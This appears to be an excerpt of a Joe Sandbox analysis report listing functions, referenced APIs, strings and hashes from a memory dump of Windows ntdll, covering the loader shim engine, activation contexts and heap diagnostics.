                                                              Control-flow Graph
                                                              • Function at 359f2410 (first basic block 359f2410-359f2433); calls the internal subroutine at 35990510 from several blocks. Graph node data omitted.
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 02c34f44b83b0c6fd79a32a64d71ca107e5c0da5705c31ee261da06e68b04939
                                                              • Instruction ID: f22356fca91b3fef24c8f2b22bf5efb196d7733424ad0877ea7208d7da4d564e
                                                              • Opcode Fuzzy Hash: 02c34f44b83b0c6fd79a32a64d71ca107e5c0da5705c31ee261da06e68b04939
                                                              • Instruction Fuzzy Hash: 4851F675A04645AFDF20CF98CC90A7EB7FEAB48242B448459E495CB641DBB5EA40CB60

                                                              Control-flow Graph
                                                              • Function at 35a1a670 (first basic block 35a1a670-35a1a6e9); calls the internal subroutines at 35952410 (twice), 359525b0 (twice) and 35984c30, and calls RtlDebugPrintTimes from multiple blocks. Graph node data omitted.
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: HEAP:
                                                              • API String ID: 3446177414-2466845122
                                                              • Opcode ID: c18274db37ee540bc14c846d4e7cff2183eade3ecefa30ec600ecad13842a6d4
                                                              • Instruction ID: 1831c9c773545b0f4e92ade7cac5ec5ae77877ffd4a0712e6a129d6729399314
                                                              • Opcode Fuzzy Hash: c18274db37ee540bc14c846d4e7cff2183eade3ecefa30ec600ecad13842a6d4
                                                              • Instruction Fuzzy Hash: 16A18875A083118FD705CE28C890E1ABBE6BF88354F054969ED56EB310EB70EE46DB91

                                                              Control-flow Graph
                                                              • Function at 35977630 (first basic block 35977630-35977651); calls RtlDebugPrintTimes and BaseQueryModuleData, plus the internal subroutines at 3594e660, 35984c30, 35977818, 359777cd, 35977728, 3597771b, 359cf290, 35989020, 3598aaa0, 3598a770, 359bcf9e, 35982c50 and 35984d48. Graph node data omitted.
                                                              Strings
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 359B4725
                                                              • ExecuteOptions, xrefs: 359B46A0
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 359B4742
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 359B4787
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 359B4655
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 359B46FC
                                                              • Execute=1, xrefs: 359B4713
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: 83cabfca114f9ab8f29129784a3dbc03f173fdc8c4ec4d43eaae8f792c721285
                                                              • Instruction ID: 56954a4ea9e8910ec3f449fc630ca0160230b28361b85da869b94ea0eccb9093
                                                              • Opcode Fuzzy Hash: 83cabfca114f9ab8f29129784a3dbc03f173fdc8c4ec4d43eaae8f792c721285
                                                              • Instruction Fuzzy Hash: AD512475A00319BAEF10DBA4DC85FAE73BDBF44304F4400EAE509AB181EB71AA45CF55
Strings
• RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 359A7AE6
• Actx , xrefs: 359A7A0C, 359A7A73
• SsHd, xrefs: 3595A3E4
• RtlpFindActivationContextSection_CheckParameters, xrefs: 359A79D0, 359A79F5
• SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 359A79D5
• SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 359A79FA
Memory Dump Source
• Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
Similarity
• API ID:
• String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
• API String ID: 0-1988757188
• Opcode ID: cae114ecd9f5ca5366a5e4116c22b8e7dd1ec7aca31b87130dc74c2507af12fe
• Instruction ID: 0df1b61a3bcd2042e40ad6d2a3e7a266899930bf62413fcfb4c411f6feecf7c7
• Opcode Fuzzy Hash: cae114ecd9f5ca5366a5e4116c22b8e7dd1ec7aca31b87130dc74c2507af12fe
• Instruction Fuzzy Hash: A6E1F2756083028FE711CF24C894B1AB7E9BB84369F500E2EFD56CB290DB31D995CB96
APIs
Strings
• Actx , xrefs: 359A9508
• RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 359A9565
• RtlpFindActivationContextSection_CheckParameters, xrefs: 359A9341, 359A9366
• SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 359A9346
• SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 359A936B
• GsHd, xrefs: 3595D874
Memory Dump Source
• Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
• API String ID: 3446177414-2196497285
• Opcode ID: 60b63f76f55b0258e8f7c26aafb46a9a4137ffdede3ddf0ebd35db5373e061e5
• Instruction ID: de6771520ff7d2168fa380b1958c0bdf39443a7e334c41b79875a07efa520d9a
• Opcode Fuzzy Hash: 60b63f76f55b0258e8f7c26aafb46a9a4137ffdede3ddf0ebd35db5373e061e5
• Instruction Fuzzy Hash: D9E1D5756083028FE710CF64C880B5AB7F9FF88368F454D6DE9968B281D771EA54CB92
APIs
• RtlDebugPrintTimes.NTDLL ref: 3593656C
  • Part of subcall function 359365B5: RtlDebugPrintTimes.NTDLL ref: 35936664
  • Part of subcall function 359365B5: RtlDebugPrintTimes.NTDLL ref: 359366AF
Strings
• Loading the shim engine DLL failed with status 0x%08lx, xrefs: 35999A2A
• Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 359999ED
• LdrpInitShimEngine, xrefs: 359999F4, 35999A07, 35999A30
• apphelp.dll, xrefs: 35936496
• Getting the shim engine exports failed with status 0x%08lx, xrefs: 35999A01
• minkernel\ntdll\ldrinit.c, xrefs: 35999A11, 35999A3A
Memory Dump Source
• Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 3446177414-204845295
• Opcode ID: 4451990ea1169f01ca9b51d58fe1945c7f7d54deef88f13d48ba8d19fd5092ff
• Instruction ID: b3925e582d30f648f99eaa7ca6b60b0ca8b42aadab135425c89543dbe4c71a85
• Opcode Fuzzy Hash: 4451990ea1169f01ca9b51d58fe1945c7f7d54deef88f13d48ba8d19fd5092ff
• Instruction Fuzzy Hash: 0551AD7161D308DFE725CF24D841B9B77FDFB88658F40092AE585AB1A1EA30E905CB93
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
• API String ID: 3446177414-4227709934
• Opcode ID: 80fbccd7dd2762c3462fc1c9360a9c57e5b114e95bcbfc94d60aa9be3ff63d6e
• Instruction ID: 377e77c95d2b7d66212164dc52a670623db413ea50051755e3ea39e0ca4a3506
• Opcode Fuzzy Hash: 80fbccd7dd2762c3462fc1c9360a9c57e5b114e95bcbfc94d60aa9be3ff63d6e
• Instruction Fuzzy Hash: EC417FB9A04209AFEF01DFD9D880AEEBBB9FF48704F100159E905B7341D7B19911DB90
APIs
Strings
• Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35999AF6
• Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35999AB4
• LdrpLoadShimEngine, xrefs: 35999ABB, 35999AFC
• minkernel\ntdll\ldrinit.c, xrefs: 35999AC5, 35999B06
Memory Dump Source
• Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
• API String ID: 3446177414-3589223738
• Opcode ID: 7572d9b6fdb930865b33f2335d290452d86c358e917b176c5d6259cd7ae7ad3c
• Instruction ID: d3ac116a6d5aed70ae63116d73d91b0e64a5f96ab8a2328d25d6f4b5403719c0
• Opcode Fuzzy Hash: 7572d9b6fdb930865b33f2335d290452d86c358e917b176c5d6259cd7ae7ad3c
• Instruction Fuzzy Hash: A3510076B193589FDB08CBACCC55E9D7BBABB44348F050066E441BF296CB64AC42DB90
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
• API String ID: 3446177414-3224558752
• Opcode ID: 5c8e1752ec445768572e3015779aae55e1807eed5c1c95e0858d0d4572994025
• Instruction ID: 47da593570d335431315bfd75b15512c4d1a13f1bb51f6408270e30fcf9f9378
• Opcode Fuzzy Hash: 5c8e1752ec445768572e3015779aae55e1807eed5c1c95e0858d0d4572994025
• Instruction Fuzzy Hash: 2C41357A604748DFE312CF24C885B5AB7BDFF80378F158569D8116B391CB74A985CBA0
APIs
Strings
• HEAP: , xrefs: 359EF15D
• Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 359EF263
• ---------------------------------------, xrefs: 359EF279
• Entry Heap Size , xrefs: 359EF26D
Memory Dump Source
• Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
• API String ID: 3446177414-1102453626
• Opcode ID: 307ba48d37d22695369838393539cae5bc729e7904b613b214991665f9a0caf2
• Instruction ID: 8a1266576a59775bc6861f8fe7c66448be5ce820684be69f47533b07b44df235
• Opcode Fuzzy Hash: 307ba48d37d22695369838393539cae5bc729e7904b613b214991665f9a0caf2
• Instruction Fuzzy Hash: DD418C39A15215DFCB06CF18D88490ABBFAFF4939871680AAD408AB311DB31EC43DF90
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
• API String ID: 3446177414-1222099010
• Opcode ID: 45988f6796089515d9f28ed9889b7ce1f8a9f7f3ba449138f32edb37e6c27ce5
• Instruction ID: ce86f2aa49c4eb2613aca19ddfa225a120b4f9188dcc640585ae4a703098cce7
• Opcode Fuzzy Hash: 45988f6796089515d9f28ed9889b7ce1f8a9f7f3ba449138f32edb37e6c27ce5
• Instruction Fuzzy Hash: AD31293A209798DFE323CB28C815F4977F9FF01768F0A4085E85657652CBB8E985CB61
Memory Dump Source
• Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
• Instruction ID: bcf94cb9d8507545faab7ab853ca3e97d5490e2d4bafcd5e6cfac8f26c79ea8c
• Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
• Instruction Fuzzy Hash: 5C0204B5608341AFD305CF18C990E6ABBF5FF88750F508A2DBD958B250DB31EA05DB92
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction ID: 04b014697e0d160026e413bfa1f2910933735fd5015835281aefd005757b54db
• Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction Fuzzy Hash: 4381C278E093498EEB14CE64C891BEEBBBBBF45360F5C4259D8B1A76D1CB349840CB50
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: $$@
• API String ID: 3446177414-1194432280
• Opcode ID: b4d04668581e7a45e4af5fd1504b69a04507044a1d62c4c865b651040351c634
• Instruction ID: 9363e05f723eb40e8787fb7205c8d05c73b3adf89c5f1854cb289ff96b9d6146
• Opcode Fuzzy Hash: b4d04668581e7a45e4af5fd1504b69a04507044a1d62c4c865b651040351c634
• Instruction Fuzzy Hash: B18119B6D052699BDB21CF54CD44BDEB7B8BB48750F0041EAE919B7240D770AE85CFA0
APIs
Strings
• LdrpFindDllActivationContext, xrefs: 359B3636, 359B3662
• Querying the active activation context failed with status 0x%08lx, xrefs: 359B365C
• Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 359B362F
• minkernel\ntdll\ldrsnap.c, xrefs: 359B3640, 359B366C
Memory Dump Source
• Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
• API String ID: 3446177414-3779518884
• Opcode ID: e2bec66b10f6eb557cf859658f33a1cf382c5743a74dbc7dec4970637f9c3ddb
• Instruction ID: b5a1d9527ed0b42d55a0dc08994cf558ce5e5ea455b13157a89344f07d96851e
• Opcode Fuzzy Hash: e2bec66b10f6eb557cf859658f33a1cf382c5743a74dbc7dec4970637f9c3ddb
• Instruction Fuzzy Hash: 233126B6908315EEEF22DB48C848F59A2ADFF41394F464067E8CC67153DBE0BF808695
                                                              Strings
                                                              • LdrpDynamicShimModule, xrefs: 359AA998
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 359AA992
                                                              • apphelp.dll, xrefs: 35962462
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 359AA9A2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: 1e5d48d089319a72edc3e2ea102948ee2377c9466760914b216b997cceec72b5
                                                              • Instruction ID: e9743545e7dfb8fb3baa1b771df98fcc9c5877151327bb1f79fe498f4cc14357
                                                              • Opcode Fuzzy Hash: 1e5d48d089319a72edc3e2ea102948ee2377c9466760914b216b997cceec72b5
                                                              • Instruction Fuzzy Hash: 7D312676A18341ABEB10CF5CDC41E6E7BB9FB88758F16005AEC017B240CB74A843DBA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: c7c9f8bdc37f674e6dbe41394107cdf57f4a31121ee2598f8db83f32fe9dc907
                                                              • Instruction ID: c2ed18673f71504149cd742054bb7e8db077f7d9a15e63b185cab1bae8998f36
                                                              • Opcode Fuzzy Hash: c7c9f8bdc37f674e6dbe41394107cdf57f4a31121ee2598f8db83f32fe9dc907
                                                              • Instruction Fuzzy Hash: C32181BAB00219ABDB00DF69CD40AEE7BFDAF48284F440116E915E7201EB31E9018BA1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 3446177414-3610490719
                                                              • Opcode ID: 93b0596f323e76eb5679e4f8c50d8d7ca045cde053773dfb3a058aa4dd844328
                                                              • Instruction ID: 77371c6fbe57c30856df9eeb49ab59377f2ae14fd292ac03e025d8cc8f331a80
                                                              • Opcode Fuzzy Hash: 93b0596f323e76eb5679e4f8c50d8d7ca045cde053773dfb3a058aa4dd844328
                                                              • Instruction Fuzzy Hash: 9E910375706741DFE716CF24C886FAAB7BABF84744F000459E9459B282EB78F841CB92
                                                              APIs
                                                              Strings
                                                              • Failed to allocated memory for shimmed module list, xrefs: 359AA10F
                                                              • LdrpCheckModule, xrefs: 359AA117
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 359AA121
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-161242083
                                                              • Opcode ID: 830df14577779cee01328f3b3e8d622c53be15fe552c76efc3166a0a7a6b00a6
                                                              • Instruction ID: 60203b0ae227cf959a40f83d93767e2c32c2c8492ee77e2e7a9b4fab503f064d
                                                              • Opcode Fuzzy Hash: 830df14577779cee01328f3b3e8d622c53be15fe552c76efc3166a0a7a6b00a6
                                                              • Instruction Fuzzy Hash: 2671DF75A04305DFEB14DF68CD91AAEB7F9FB48318F154469D802EB211EB38AD46CB60
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $File
                                                              • API String ID: 3446177414-2412145507
                                                              • Opcode ID: 853be8fc39aeeee2cb498902cb02b3dc4d989ae670630bc63bd8b854f89ce358
                                                              • Instruction ID: cb045542d04edb9e335cd10954c438d3dea59b9b4632a46cecd850495308941b
                                                              • Opcode Fuzzy Hash: 853be8fc39aeeee2cb498902cb02b3dc4d989ae670630bc63bd8b854f89ce358
                                                              • Instruction Fuzzy Hash: E661DD72A1422DABDB26CF64DC41FEDB7BDAB08700F4441E9A919E6181DB70AF80DF50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                              • API String ID: 3446177414-2283098728
